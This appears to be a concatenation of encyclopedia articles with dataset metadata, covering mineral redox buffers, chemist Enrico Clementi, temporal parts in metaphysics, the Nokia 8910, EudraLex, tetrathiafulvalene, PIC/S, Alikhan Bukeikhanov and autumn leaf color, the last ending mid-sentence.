(Fe1−xS) occur in many ore deposits. Pyrite and its polymorph marcasite also are important in many coal deposits and shales. These sulfide minerals form in environments more reducing than that of the Earth's surface. When in contact with oxidizing surface waters, sulfides react: sulfate (SO42−) forms, and the water becomes acidic and charged with a variety of elements, some potentially toxic. Consequences can be environmentally harmful, as discussed in the entry for acid mine drainage. Sulfur oxidation to sulfate or sulfur dioxide also is important in generating sulfur-rich volcanic eruptions, like those of Pinatubo in 1991 and El Chichon in 1982. These eruptions contributed unusually large quantities of sulfur dioxide to the Earth's atmosphere, with consequent effects on atmospheric quality and on climate. The magmas were unusually oxidizing, almost two log units more so than the NiNiO buffer. The calcium sulfate, anhydrite, was present as phenocrysts in the erupted tephra. In contrast, sulfides contain most of the sulfur in magmas more reducing than the FMQ buffer. See also Ellingham diagram Normative mineralogy References Further reading Inorganic chemistry Igneous rocks Petrology Geochemistry
Mineral redox buffer
[ "Chemistry" ]
1,465
[ "nan" ]
7,452,269
https://en.wikipedia.org/wiki/Enrico%20Clementi
Enrico Clementi (November 19, 1931 in Cembra, Italy - March 30, 2021) was an Italian chemist, a pioneer in computational techniques for quantum chemistry and molecular dynamics. Dr. Clementi received his Ph.D. in Chemistry from University of Pavia, where he was a student in the Collegio Cairoli, in 1954 and joined IBM Research in 1961. At IBM he was first responsible for atomic calculations, then manager of a scientific computation department until 1974. As an IBM Fellow (elected 1969), he led research and development in parallel computer architecture and fundamental research in chemistry, biophysics and fluid dynamics. In 1991 he retired from IBM to join Université Louis Pasteur in Strasbourg, France as Professor of Chemistry from 1992 until 2000. Dr Clementi's work has been recognized by awards and honours: IBM Fellow (1969), Fellow of the American Physical Society (1984), President of the International Society of Quantum Biology, Alexander von Humboldt award (2001), Member of the International Academy of Quantum Molecular Science. Selected publications E. Clementi, "Tables of Atomic Functions", IBM Journal of Research and Development, Special Supplement, Vol. 9, No. 1, 1965 E. Clementi, C. Roetti, of "Tables of Roothaan-Hartree-Fock Wavefunctions", Special Issue in Atomic Data and Nuclear Data Table, Academic Press, New York, 1974 Books Enrico Clementi: "Tables of atomic functions", International Business Machines Corp (1965). Enrico Clementi, Carla Roetti:"Atomic Data and Nuclear Data Tables", Academic Press, 1st ed.(1974). Enrico Clementi: "Roothaan-Hartree-Fock atomic wavefunctions: Basic functions and their coefficients for ground and certain excited states of neutral and ionized atoms, Z<54", Academic Press (1974). Enrico Clementi:"Determination of Liquid Water Structure: Coordination Numbers for Ions and Solvation for biological Molecules",(Lecture Notes in Chemistry 2), Springer-Verlag, (1976). Enrico Clementi: "Computational Aspects for Large Chemical Systems", Lecture Notes in Chemistry No.19, Springer-Verlag(1980). Enrico Clementi (Ed.), Ramaswamy H. Sarma (Ed.):"Structure and Dynamics: Nucleic Acids and Proteins; Lajolla Symposium Proce Edings, 1982", Proceedings of International Symposium on Structure and Dynamics of Nucleic Acids and Protei", Adenine Pr, (1983). Enrico Clementi: "Biological and Artificial Intelligence Systems", Springer; 1st ed., (Sep. 30th, 1988). E. Clementi (Ed.): "Modern Techniques in Computational Chemistry: MOTECC-89", Springer, (1989). E. Clementi (Ed.): "Modern Techniques in Computational Chemistry: MOTECC-90", Springer, (1990). E. Clementi (Ed.): "Modern Techniques in Computational Chemistry: MOTECC-91", Springer, (1991). Enrico Clementi (Ed.):"Methods and Techniques in Computational Chemistry: METECC-94, Volume C: Structure and Dynamics", STEF, (1993). Enrico Clementi (Ed.), Giorgina Corongiu (Ed.):"Methods and Techniques in Computational Chemistry: METECC-95", STEF, Cagliari, (1995). Jean-Marie Andre, David H. Mosley, Marie-Claude Andre, Benoit Champagne, Enrico Clementi, Joseph G. Fripiat, Laurence Leherte, Lorenzo Pisani, Daniel P. Vercauteren, Marjan Vracko :"Exploring Aspects of Computational Chemistry", (in French), Presses Universitaires De Namur, (1997). Enrico Clementi (Ed.), Jean-Marie André (Ed.), J. Andrew McCammon (Ed.):"Theory and Applications in Computational Chemistry: The First Decade of the Second Millennium:: International Congress TACC-2012 (AIP Conference Proceedings)", American Institute of Physics, , (Aug. 29th, 2012). References External links Bio at IAQMS Computer del futuro. Conversazione con Enrico Clementi (Interview Movie. 1987 at IBM Kingston) Enrico Clementi: Produced by Quantum Theory Project Dept. Chem. and Phys. Univ. Florida 1931 births 2021 deaths People from Trentino IBM Fellows Members of the International Academy of Quantum Molecular Science Theoretical chemists Italian chemists Computational chemists Fellows of the American Physical Society
Enrico Clementi
[ "Chemistry" ]
958
[ "Quantum chemistry", "Physical chemists", "Computational chemists", "Theoretical chemistry", "Computational chemistry", "Theoretical chemists" ]
7,453,251
https://en.wikipedia.org/wiki/Temporal%20parts
In contemporary metaphysics, temporal parts are the parts of an object that exist in time. A temporal part would be something like "the first year of a person's life", or "all of a table from between 10:00 a.m. on June 21, 1994 to 11:00 p.m. on July 23, 1996". The term is used in the debate over the persistence of material objects. Objects typically have parts that exist in space—a human body, for example, has spatial parts like hands, feet, and legs. Some metaphysicians believe objects have temporal parts as well. Originally it was argued that those who believe in temporal parts believe in perdurantism, that persisting objects are wholes composed entirely of temporal parts. This view was contrasted with endurantism, the claim that objects are wholly present at any one time (thus not having different temporal parts at different times). This claim is still commonplace, but philosophers like Ted Sider believe that even endurantists should accept temporal parts. Definition Not everyone was happy with the definition by analogy: some philosophers, such as Peter van Inwagen, argued that—even given the definition by analogy—they still had no real idea what a temporal part was meant to be, whilst others have felt that whether temporal parts existed or not is merely a verbal dispute (Eli Hirsch holds this view). Gallois surveys some of the attempts to create a more specific definition. The early attempts included identifying temporal parts with ordered pairs of times and objects, but it seems relatively unproblematic that temporal parts exist given the definition and ordered pairs seem unsuitable to play the role that perdurantists demand, such as being parts of persisting wholes—how can a set be a part of a material object? Later perdurantists identified persisting objects with events, and as events having temporal parts was not problematic (for example, the first and second halves of a football match), it was imagined that persisting objects could have temporal parts. There was a reluctance from many to identify objects with events, and this definition has long since fallen out of fashion. Of the definitions closest to those commonly used in the literature, the earliest was Thomson: x is a cross-sectional temporal part of y =df (∃T)[y and x exist through T & no part of x exists outside T & (∀t)(t is in T ⊃ (∀P)(y exactly occupies P at t ⊃ x exactly occupies P at t))]. Later, Sider tried to combat the fears of endurantists who could not understand what a temporal part is by defining it in terms of "part at a time" or "parthood at a time", a relation that the endurantist should accept, unlike parthood simpliciter—which an endurantist may say makes no sense, given that all parts are had at a time. (However, McDaniel argues that even endurantists should accept that notion). Sider gave the following definition, which is widely used: x is an instantaneous temporal part of y at instant t =df (i) x is a part of y; (ii) x exists at, but only, at t; and (iii) x overlaps every part of y that exists at t. Sider also gave an alternative definition that is compatible with presentism, using the tensed operators "WILL" and "WAS": x is an instantaneous temporal part of y =df (i) x is a part of y; (ii) x overlaps every part of y; (iii) it is not the case that WILL (x exists); (iv) it is not the case that WAS (x exists). While Sider's definition is most commonly used, Zimmerman—troubled by the demand for instants (which may not exist in a gunky space-time that is such that every region has a sub-region)—gives the following: x is a temporal part of y throughout T =df (i) x exists during and only during T; (ii) for every subinterval T* of T, there is a z such that (a) z is a part of x, and (b) for all u, u has a part in common with z during T* if and only if u has a part in common with y during T*; and (iii) y exists at times outside of T. The argument from temporary intrinsics Temporal parts are sometimes used to account for change. The problem of change is just that if an object x and an object y have different properties, then by Leibniz's Law, one ought to conclude that they are different. For example, if a person changes from having long hair to short hair, then the temporal-parts theorist can say that change is the difference between the temporal parts of a temporally extended object (the person). So, the person changes by having a temporal part with long hair, and a temporal part with short hair; the temporal parts are different, which is consistent with Leibniz's Law. However, those who reject the notion that ordinary objects, like people, have temporal parts usually adopt a more common-sense view. They say that an object has properties at times. In this view, the person changes by having long hair at t, to short hair at t'''. To them, there is no contradiction in thinking an object is capable of having different properties at different times. An argument widely held to favor the concept of temporal parts arises from these points: David Lewis' argument from temporary intrinsics, which he first advanced in On the Plurality of Worlds. The outline of the argument is as follows: P1: There are intrinsic properties, i.e., properties had by an object independently of anything in the world. P2: If every property had by an object is had to times, then there are no intrinsic properties. C1: Therefore, not every property had by an object is had two times. Objects have some of their properties intrinsically, i.e., simpliciter. P3: But only temporal parts can have their properties simpliciter. C2: Therefore, there are temporal parts. (For this to follow, it is required that there be objects). Premise P1 is an intuitive premise; generally we distinguish between properties and relations. An intrinsic property is just a property that something has independently of anything else; an extrinsic property is had only in relation to something. An example of an extrinsic property is "fatherhood": something is a father only if that something is a male and has a child. An example of an alleged intrinsic property is "shape". According to Lewis, if we know what "shapes" are, we know them to be properties, not relations. However, if properties are had to times, as endurantists say, then no property is intrinsic. Even if a ball is round throughout its existence, the endurantist must say "for all times in which the ball exists, the ball is round, i.e., it is round at those times; it has the property 'being round at a time'." So, if all properties are had to times, then there are no intrinsic properties, (premise P2). However, if we think that Lewis is right and some properties are intrinsic, then some properties are not had to times—they are had simpliciter (premise C1). It might be said that premise P3 is more controversial. For instance, suppose a timeless world is possible. If that were so, then in that world, even if there were intrinsic properties, they would not be had by temporal parts—since by definition a timeless world has no temporal dimension, and therefore in such a world there cannot be temporal parts. However, our world is not timeless, and the possibility of timeless worlds is questionable, so it seems reasonable to think that in worlds with a temporal dimension, only temporal parts can have properties simpliciter. This is so because temporal parts exist only at an instant, and therefore it makes no sense to speak of them as having properties at a time. Temporal parts have properties, and have a temporal location. So if person A changes from having long hair to having short hair, then that can be paraphrased by saying that there is a temporal part of A that has long hair simpliciter and another that has short hair simpliciter'', and the latter is after the former in the temporal sequence; that supports premise P3. Premise C2 follows, so long as one is not considering empty worlds—if such worlds are even possible. An empty world doesn't have objects that change by having a temporal part with a certain property and another temporal part with a certain other property. Premise P1, the key premise of the argument, can be coherently denied even if the resulting view—the abandonment of intrinsic properties—is counterintuitive. There are, however, ways to support the argument if one accepts relationalism about space-time. See also Four-dimensionalism Mereological nihilism Mereology References Further reading Philosophical logic Mereology Concepts in metaphysics Identity (philosophy) Philosophy of time
Temporal parts
[ "Physics" ]
1,917
[ "Spacetime", "Philosophy of time", "Physical quantities", "Time" ]
7,453,965
https://en.wikipedia.org/wiki/Nokia%208910
The Nokia 8910 is a mobile phone released in 2002 by Nokia. Part of the luxury 8xxx series, it was introduced as a successor of the Nokia 8850/8890. It has a white backlight, and features Bluetooth connectivity. It was succeeded by the Nokia 8910i, which was released in 2003. See also Vertu References Mobile phones introduced in 2002 8910 Mobile phones with infrared transmitter Slider phones
Nokia 8910
[ "Technology" ]
90
[ "Mobile technology stubs", "Mobile phone stubs" ]
7,454,086
https://en.wikipedia.org/wiki/EudraLex
EudraLex is the collection of rules and regulations governing medicinal products in the European Union. Volumes EudraLex consists of 10 volumes: Concerning Medicinal Products for Human use: Volume 1 - Pharmaceutical Legislation. Volume 2 - Notice to Applicants. Volume 2A deals with procedures for marketing authorisation. Volume 2B deals with the presentation and content of the application dossier. Volume 2C deals with Guidelines. Volume 3 - Guidelines. Concerning Medicinal Products for human use in clinical trials (investigational medicinal products). Volume 10 - Clinical trials. Concerning Veterinary Medicinal Products: Volume 5 - Pharmaceutical Legislation. Volume 6 - Notice to Applicants. Volume 7 - Guidelines. Volume 8 - Maximum residue limits. Concerning Medicinal Products for Human and Veterinary use: Volume 4 - Good Manufacturing Practices. Volume 9 - Pharmacovigilance. Miscellaneous: Guidelines on Good Distribution Practice of Medicinal Products for Human Use (94/C 63/03) Directives Directive 65/65/EEC1, requires prior approval for marketing of proprietary medicinal products Directive 75/318/EEC, clarifies requirements of 65/65/EEC1 and requires member states to enforce them Directive 75/319/EEC, requires marketing authorization requests to be drawn up only by qualified experts Directive 93/41/EEC, establishes the European Agency for the Evaluation of Medicinal Products Directive 2001/20/EC, defines rules for the conduct of clinical trials Directive 2001/83/EC Directive 2005/28/EC, defines Good Clinical Practice for design and conduct of clinical trials See also European Union law European Union directive European Commission Directorate-General EUR-Lex Regulation of therapeutic goods International Conference on Harmonisation of Technical Requirements for Registration of Pharmaceuticals for Human Use Good clinical practice European Medicines Agency EUDRANET EudraVigilance Title 21 of the Code of Federal Regulations (USA) Drug development References Eudralex,The Rules Governing Medicinal Products in the European Union, European Communities Commission. Directorate-General for Industry, Pharmaceuticals and Cosmetics. Vol. 1: Pharmaceutical legislation: medicinal products for human use. Vol. 2: Notice to applicants: medicinal products for human use. Vol. 3: Guidelines: medicinal products for human use. Vol. 4: Good manufacturing practices: medicinal products for human and veterinary use. Vol. 5: Pharmaceutical legislation: veterinary medicinal products. Vol. 6: Notice to applicants: veterinary medical products. Vol. 7. Guidelines: Veterinary medicinal products. Markus Hartmann and Florence Hartmann-Vareilles, The Clinical Trials Directive: How Is It Affecting Europe's Noncommercial Research?, PLoS Clin Trials. 2006 June; 1(2): e13 External links News on Pharmaceuticals, (European Union) EudraLex EUR-Lex Review of pharmaceutical legislation (EU DG Enterprise and Industry) Directorate General Enterprise and Industry (European Commission) European Union health policy European Union law Pharmaceuticals policy National agencies for drug regulation de:Arzneimittelzulassung#Europäische Union
EudraLex
[ "Chemistry" ]
607
[ "National agencies for drug regulation", "Drug safety" ]
7,454,236
https://en.wikipedia.org/wiki/Tetrathiafulvalene
Tetrathiafulvalene (TTF) is an organosulfur compound with the formula (. Studies on this heterocyclic compound contributed to the development of molecular electronics. TTF is related to the hydrocarbon fulvalene, , by replacement of four CH groups with sulfur atoms. Over 10,000 scientific publications discuss TTF and its derivatives. Preparation The high level of interest in TTFs has spawned the development of many syntheses of TTF and its analogues. Most preparations entail the coupling of cyclic building blocks such as 1,3-dithiole-2-thion or the related 1,3-dithiole-2-ones. For TTF itself, the synthesis begins with the cyclic trithiocarbonate (1,3-dithiole-2-thione), which is S-methylated and then reduced to give (1,3-dithiole-2-yl methyl thioether), which is treated as follows: Redox properties Bulk TTF itself has unremarkable electrical properties. Distinctive properties are, however, associated with salts of its oxidized derivatives, such as salts derived from . The high electrical conductivity of TTF salts can be attributed to the following features of TTF: its planarity, which allows π-π stacking of its oxidized derivatives, its high symmetry, which promotes charge delocalization, thereby minimizing coulombic repulsions, and its ability to undergo oxidation at mild potentials to give a stable radical cation. Electrochemical measurements show that TTF can be oxidized twice reversibly: (E = 0.34 V) (E = 0.78 V, vs. Ag/AgCl in solution) Each dithiolylidene ring in TTF has 7π electrons: 2 for each sulfur atom, 1 for each sp2 carbon atom. Thus, oxidation converts each ring to an aromatic 6π-electron configuration, consequently leaving the central double bond essentially a single bond, as all π-electrons occupy ring orbitals. History The salt was reported to be a semiconductor in 1972. Subsequently, the charge-transfer salt [TTF]TCNQ was shown to be a narrow band gap semiconductor. X-ray diffraction studies of [TTF][TCNQ] revealed stacks of partially oxidized TTF molecules adjacent to anionic stacks of TCNQ molecules. This "segregated stack" motif was unexpected and is responsible for the distinctive electrical properties, i.e. high and anisotropic electrical conductivity. Since these early discoveries, numerous analogues of TTF have been prepared. Well studied analogues include tetramethyltetrathiafulvalene (Me4TTF), tetramethylselenafulvalenes (TMTSFs), and bis(ethylenedithio)tetrathiafulvalene (BEDT-TTF, CAS [66946-48-3]). Several tetramethyltetrathiafulvalene salts (called Fabre salts) are of some relevance as organic superconductors. See also Bechgaard salt References Further reading Physical properties of Tetrathiafulvalene from the literature. Molecular electronics Organic semiconductors Dithioles
Tetrathiafulvalene
[ "Chemistry", "Materials_science" ]
690
[ "Molecular physics", "Semiconductor materials", "Molecular electronics", "Nanotechnology", "Organic semiconductors" ]
7,454,377
https://en.wikipedia.org/wiki/Pharmaceutical%20Inspection%20Convention%20and%20Pharmaceutical%20Inspection%20Co-operation%20Scheme
The Pharmaceutical Inspection Convention and Pharmaceutical Inspection Co-operation Scheme (PIC/S) are two international instruments between countries and pharmaceutical inspection authorities. The PIC/S is meant as an instrument to improve co-operation in the field of Good Manufacturing Practices between regulatory authorities and the pharmaceutical industry. History The PIC (Pharmaceutical Inspection Convention) was founded in October 1970 by the European Free Trade Association (EFTA), under the title of the Convention for the Mutual Recognition of Inspections in Respect of the Manufacture of Pharmaceutical Products. The initial members comprised the 10 member countries of EFTA at that time. In the early 1990s it was realized that because of an incompatibility between the Convention and European law, it was not possible for new countries to be admitted as members of PIC. European law did not permit individual EU countries that were members of PIC to sign agreements with other countries seeking to join PIC. As a consequence the Pharmaceutical Inspection Co-operation Scheme was formed on 2 November 1995. The Pharmaceutical Inspection Co-operation Scheme is an informal agreement between health authorities instead of a formal treaty between countries. PIC and the PIC Scheme, which operate together in parallel, are jointly referred to as PIC/S. PIC/S became operational in November 1995. Since its conception until 2003, PIC/S did not have a distinct legal identity. Its Secretariat was provided by the European Free Trade Association. Based on PIC/S meeting in June 2003, its committee decided to constitute itself as a Swiss Association in accordance with article 60 of the Swiss Civil Code which refer to other internationally active organizations established in Switzerland such as the International Committee of the Red Cross (ICRC). On 1 January 2004, PIC/S established its own Secretariat in Geneva, Switzerland. Purpose PIC/S has a number of provisions intended to establish the following: Mutual recognition of inspection between member countries, so that an inspection carried out by officials of one member country will be recognized as valid by other members. Equivalent principles of inspection methodology, so that it is understood that inspectors in each member country will be following the same best practices when carrying out inspections. Mechanisms for the training of inspectors. Harmonization of written standards of Good Manufacturing Practices. Lines of communication between member country inspectors/inspectorates. Members The following are the state members of PIC/S as of October 2021: See also GxP Good automated manufacturing practice (GAMP) Corrective and preventive action (CAPA) Validation (drug manufacture) European Medicines Agency (EMEA) European Federation of Pharmaceutical Industries and Associations (EFPIA) Pharmaceutical Research and Manufacturers of America (PhRMA) References External links European Federation of Pharmaceutical Industries and Associations (EFPIA) Japan Pharmaceutical Manufacturers Association (JPMA) Pharmaceutical Research and Manufacturers of America (PhRMA) Pharmaceutical industry Pharmaceuticals policy Intergovernmental organizations established by treaty International organisations based in Switzerland
Pharmaceutical Inspection Convention and Pharmaceutical Inspection Co-operation Scheme
[ "Chemistry", "Biology" ]
573
[ "Pharmacology", "Life sciences industry", "Pharmaceutical industry", "Medicinal chemistry stubs", "Pharmacology stubs" ]
7,454,381
https://en.wikipedia.org/wiki/Alikhan%20Bukeikhanov
Alikhan Nurmukhameduly Bukeikhan (5 March 1866 – 27 September 1937) was a Kazakh politician and publisher who served as the Chairman (Prime Minister) of the Kazakh Provisional National Government of Alash Orda and one of the leaders of the Alash party from late 1917 to 1920. Early life Alikhan Bukeikhanov was born into a Kazakh Muslim family on 5 March 1866, in Tokyrauyn Volost, Russian Empire. He was the son of Nurmuhammed Bukeikhanov and as a great-grandson of Barak Sultan, former khan of the Orta zhuz, he was a direct descendant of Genghis Khan. Bukeikhanov graduated from the Russian-Kazakh School and Omsk Technical School in 1890. He later studied at the Saint Petersburg Forestry Institute, where he graduated from the Faculty of Economics in 1894. During Bukeikhanov's youth, it is believed that he was influenced by socialists. Upon graduating, Bukeikhanov returned to Omsk and spent the next fourteen years there working. From 1895 to 1897, he worked as a math teacher in the Omsk school for Kazakh children. Bukeikhanov was a participant in the 1896 Shcherbina Expedition, which aimed to research and assess virtually every aspect of Russian Central Asia's environment and resources to the culture and traditions of its inhabitants. This was the first of a few similar missions which he accepted. Among his recorded contributions were "Ovtsevodstvo v stepnom krae" ("Sheep-Breeding in the Steppe Land"), which analyzed animal husbandry in Central Asia. Bukeikhanov was the first biographer of Abay Kunanbayev, publishing an obituary in Semipalatinsky listok in 1905. In 1909, he published a collection of Kunanbayev's works. Political life In 1905, Bukeikhanov's political activism began when he joined the Constitutional Democratic Party. In late 1905 at the Uralsk Oblast Party Congress, he tried to create the Kazakh Democratic party but failed. As a result of this action, he was arrested and prohibited from living in the Steppe Oblasts. During his exile, he relocated to Samara. He was elected to the State Duma of the Russian Empire as a member of that party in 1906 and signed the Vyborg petition to protest the dissolution of the Duma by the tsar. In 1908, he was arrested again and exiled in Samara until 1917. While in Samara, he participated in the Samara Guberniya Committee of the People's Freedom Party set up in 1915. Author of the idea of the First Kazakh Republic In April 1917, Bukeikhanov, Akhmet Baitursynov and several other native political figures took the initiative to convene an All-Kazakh Congress in Orenburg. In its resolution, Congress urged the return to the native population of all the lands confiscated from it by the previous regime and the expulsion of all the new settlers from the Kazakh-Kirghiz territories. Other resolutions demanded the transfer of the local schools into native hands and the termination of the recruitment introduced in 1916. Within the group, Bukeikhanov, along with Russian liberals, chiefly the Kadets sought to direct attention first to economic problems, whereas others sought to unite the Kazakhs with the other Turkic peoples of Russia. Three months later, another Kazakh-Kirghiz Congress met in Orenburg. There, for the first time, the idea of territorial autonomy emerged, and a national Kazakh-Kirghiz political party was formed, the Alash Autonomy. Before the February Revolution, Bukeikhanov collaborated with the Kadets in the hope of getting autonomous status for Kazakhs and contacted the head of the Russian Provisional Government Alexander Kerensky. Kerensky proceeded to make Bukeikhanov a commissar. On 19 March 1917, he was appointed as the Provisional Government Commissioner of Turgay Oblast. After the October Revolution, he was elected in 1917 as president of the Alash Orda government of Alash Autonomy. In 1920, after the establishment of Soviet hegemony, Bukeikhanov joined the Bolshevik party and returned to scientific life. His earlier political activities caused the authorities to view him with suspicion, leading to arrests in 1926 and 1928. In 1926, Bukeikhanov was arrested on the charge of counter-revolutionary activity and put into the Butyrka prison in Moscow. But due to the lack of evidence in the criminal case against him, he was released from prison. In 1930, the authorities banished him to Moscow, where he was arrested a final time in 1937 and executed. It was not until 1989 that the Soviet authorities rehabilitated him. Writings Bukeikhanov's major political publication was "Kirgizy" ("The Kazakhs") (1910), which was released in the Constitutional Democratic party book on nationalities edited by A. I. Kosteliansky. Bukeikhanov's other activities of this period included assisting in the creation of Qazaq, a Kazakh language newspaper, and writing articles for newspapers, including "Dala Walayatynyng Gazeti" (Omsk), "Orenburgskii Listok", "Semipalatinskii Listok", "Turkestanskie Vedomosti" (Tashkent), "Stepnoi Pioner" (Omsk), and "Sary-Arqa" (Semipalatinsk). He was also a contributor to Ay Qap and "Sibirskie Voprosy". Explanatory notes References Sources External links The Geography of Civilizations: A Spatial Analysis of the Kazakh Intelligentsia's activities, From the Mid-Nineteenth to the Early Twentieth Century |- |- 1866 births 1937 deaths Kazakh writers from the Russian Empire 19th-century writers from the Russian Empire People from Karaganda Region People from Semipalatinsk Oblast Russian Constitutional Democratic Party members Members of the 1st State Duma of the Russian Empire Environmental scientists Kazakh-language writers Kazakhstani scientists Members of the Grand Orient of Russia's Peoples Saint-Petersburg State Forestry University alumni Executed politicians Great Purge victims from Kazakhstan Alash Autonomy Muslims from the Russian Empire Inmates of Butyrka prison
Alikhan Bukeikhanov
[ "Environmental_science" ]
1,280
[ "Environmental scientists" ]
7,454,563
https://en.wikipedia.org/wiki/Autumn%20leaf%20color
Autumn leaf color is a phenomenon that affects the normally green leaves of many deciduous trees and shrubs by which they take on, during a few weeks in the autumn season, various shades of yellow, orange, red, purple, and brown. The phenomenon is commonly called autumn colours or autumn foliage in British English and fall colors, fall foliage, or simply foliage in American English. In some areas of Canada and the United States, "leaf peeping" tourism is a major contribution to economic activity. This tourist activity occurs between the beginning of color changes and the onset of leaf fall, usually around September to November in the Northern Hemisphere and March to May in the Southern Hemisphere. Chlorophyll and the green/yellow/orange colors A green leaf is green because of the presence of a pigment known as chlorophyll, which is inside an organelle called a chloroplast. When abundant in the leaf's cells, as during the growing season, the chlorophyll's green color dominates and masks out the colors of any other pigments that may be present in the leaf. Thus, the leaves of summer are characteristically green. Chlorophyll has a vital function: it captures solar rays and uses the resulting energy in the manufacture of the plant's food simple sugars which are produced from water and carbon dioxide. These sugars are the basis of the plant's nourishment the sole source of the carbohydrates needed for growth and development. In their food-manufacturing process, the chlorophylls break down, thus are continually "used up". During the growing season, however, the plant replenishes the chlorophyll so that the supply remains high and the leaves stay green. In late summer, with daylight hours shortening and temperatures cooling, the veins that carry fluids into and out of the leaf are gradually closed off as a layer of special cork cells forms at the base of each leaf. As this cork layer develops, water and mineral intake into the leaf is reduced, slowly at first, and then more rapidly. During this time, the amount of chlorophyll in the leaf begins to decrease. Often, the veins are still green after the tissues between them have almost completely changed color. Chlorophyll is located in the thylakoid membrane of the chloroplast and it is composed of an apoprotein along with several ligands, the most important of which are chlorophylls a and b. In the autumn, this complex is broken down. Chlorophyll degradation is thought to occur first. Research suggests that the beginning of chlorophyll degradation is catalyzed by chlorophyll b reductase, which reduces chlorophyll b to 7‑hydroxymethyl chlorophyll a, which is then reduced to chlorophyll a. This is believed to destabilize the complex, at which point breakdown of the apoprotein occurs. An important enzyme in the breakdown of the apoprotein is FtsH6, which belongs to the FtsH family of proteases. Chlorophylls degrade into colorless tetrapyrroles known as nonfluorescent chlorophyll catabolites. As the chlorophylls degrade, the hidden pigments of yellow xanthophylls and orange beta-carotene are revealed. Pigments that contribute to other colors Carotenoids Carotenoids are present in the leaves throughout the year, but their orange-yellow colors are usually masked by green chlorophyll. As autumn approaches, certain influences both inside and outside the plant cause the chlorophylls to be replaced at a slower rate than they are being used up. During this period, with the total supply of chlorophylls gradually dwindling, the "masking" effect slowly fades away. Then other pigments present (along with the chlorophylls) in the leaf's cells begin to show through. These are carotenoids and they provide colorations of yellow, brown, orange, and the many hues in between. The carotenoids occur, along with the chlorophyll pigments, in tiny structures called plastids, within the cells of leaves. Sometimes, they are in such abundance in the leaf that they give a plant a yellow-green color, even during the summer. Usually, however, they become prominent for the first time in autumn, when the leaves begin to lose their chlorophyll. Carotenoids are common in many living things, giving characteristic color to carrots, corn, canaries, and daffodils, as well as egg yolks, rutabagas, buttercups, and bananas. Their brilliant yellows and oranges tint the leaves of such hardwood species as hickories, ash, maple, yellow poplar, aspen, birch, black cherry, sycamore, cottonwood, sassafras, and alder. Carotenoids are the dominant pigment in coloration of about 15–30% of tree species. Autumn leaf color is a phenomenon that affects the normally green leaves of many deciduous trees and shrubs by which they take on, during a few weeks in the autumn season, various shades of yellow, orange, red, purple, and brown. The phenomenon is commonly called autumn colours or autumn foliage in British English and fall colors, fall foliage, or simply foliage in American English. Anthocyanins The reds, the purples, and their blended combinations that decorate autumn foliage come from another group of pigments in the cells called anthocyanins. Unlike the carotenoids, these pigments are not present in the leaf throughout the growing season, but are actively produced towards the end of summer. They develop in late summer in the sap of the cells of the leaf, and this development is the result of complex interactions of many influences both inside and outside the plant. Their formation depends on the breakdown of sugars in the presence of bright light as the level of phosphate in the leaf is reduced. During the summer growing season, phosphate is at a high level. It has a vital role in the breakdown of the sugars manufactured by chlorophyll, but in autumn, phosphate, along with the other chemicals and nutrients, moves out of the leaf into the stem of the plant. When this happens, the sugar-breakdown process changes, leading to the production of anthocyanin pigments. The brighter the light during this period, the greater the production of anthocyanins and the more brilliant the resulting color display. When the days of autumn are bright and cool, and the nights are chilly but not freezing, the brightest colorations usually develop. Anthocyanins temporarily color the edges of some of the very young leaves as they unfold from the buds in early spring. They also give the familiar color to such common fruits as cranberries, red apples, blueberries, cherries, strawberries, and plums. Anthocyanins are present in about 10% of tree species in temperate regions, although in certain areas most famously northern New England up to 70% of tree species may produce the pigment. In autumn forests, they appear vivid in the maples, oaks, sourwood, sweetgums, dogwoods, tupelos, cherry trees, and persimmons. These same pigments often combine with the carotenoids' colors to create the deeper orange, fiery reds, and bronzes typical of many hardwood species. Function of autumn colors Deciduous plants were traditionally believed to shed their leaves in autumn primarily because the high costs involved in their maintenance would outweigh the benefits from photosynthesis during the winter period of low light availability and cold temperatures. In many cases, this turned out to be oversimplistic other factors involved include insect predation, water loss, and damage from high winds or snowfall. Anthocyanins, responsible for red-purple coloration, are actively produced in autumn, but not involved in leaf-drop. A number of hypotheses on the role of pigment production in leaf-drop have been proposed, and generally fall into two categories: interaction with animals, and protection from nonbiological factors. Photoprotection According to the photoprotection theory, anthocyanins protect the leaf against the harmful effects of light at low temperatures. The leaves are about to fall, so protection is not of extreme importance for the tree. Photo-oxidation and photoinhibition, however, especially at low temperatures, make the process of reabsorbing nutrients less efficient. By shielding the leaf with anthocyanins, according to photoprotection theory, the tree manages to reabsorb nutrients (especially nitrogen) more efficiently. Coevolution According to the coevolution theory, the colors are warning signals to insects like aphids that use trees as a host for the winter. If the colors are linked to the amount of chemical defenses against insects, then the insects will avoid red leaves and increase their fitness; at the same time, trees with red leaves have an advantage because they reduce their parasite load. This has been shown in the case of apple trees where some domesticated apple varieties, unlike wild ones, lack red leaves in the autumn. A greater proportion of aphids that avoid apple trees with red leaves manage to grow and develop compared to those that do not. A trade-off, moreover, exists between fruit size, leaf color, and aphids resistance as varieties with red leaves have smaller fruits, suggesting a cost to the production of red leaves linked to a greater need for reduced aphid infestation. Consistent with red-leaved trees providing reduced survival for aphids, tree species with bright leaves tend to select for more specialist aphid pests than do trees lacking bright leaves (autumn colors are useful only in those species coevolving with insect pests in autumn). One study found that simulating insect herbivory (leaf-eating damage) on maple trees showed earlier red coloration than trees that were not damaged. The coevolution theory of autumn colors was proposed by W. D. Hamilton in 2001 as an example of evolutionary signalling theory. With biological signals such as red leaves, it is argued that because they are costly to produce, they are usually honest, so signal the true quality of the signaller with low-quality individuals being unable to fake them and cheat. Autumn colors would be a signal if they were costly to produce, or be impossible to fake (for example if autumn pigments were produced by the same biochemical pathway that produces the chemical defenses against the insects). The change of leaf colors prior to fall have also been suggested as adaptations that may help to undermine the camouflage of herbivores. Many plants with berries attract birds with especially visible berry and/or leaf color, particularly bright red. The birds get a meal, while the shrub, vine, or typically small tree gets undigested seeds carried off and deposited with the birds' manure. Poison ivy is particularly notable for having bright-red foliage drawing birds to its off-white seeds (which are edible for birds, but not most mammals). Allelopathy The brilliant red autumn color of some species of maple is created by processes separate from those in chlorophyll breakdown. When the tree is struggling to cope with the energy demands of a changing and challenging season, maple trees are involved in an additional metabolic expenditure to create anthocyanins. These anthocyanins, which create the visual red hues, have been found to aid in interspecific competition by stunting the growth of nearby saplings (allelopathy). Tourism Although some autumn coloration occurs wherever deciduous trees are found, the most brightly colored autumn foliage is found in the northern hemisphere, including most of southern mainland Canada, some areas of the northern United States, Northern and Western Europe, Northern Italy, the Caucasus region of Russia near the Black Sea, and Eastern Asia (including much of northern and eastern China, and as well as Korea and Japan). In the southern hemisphere, colorful autumn foliage can be observed in southern and 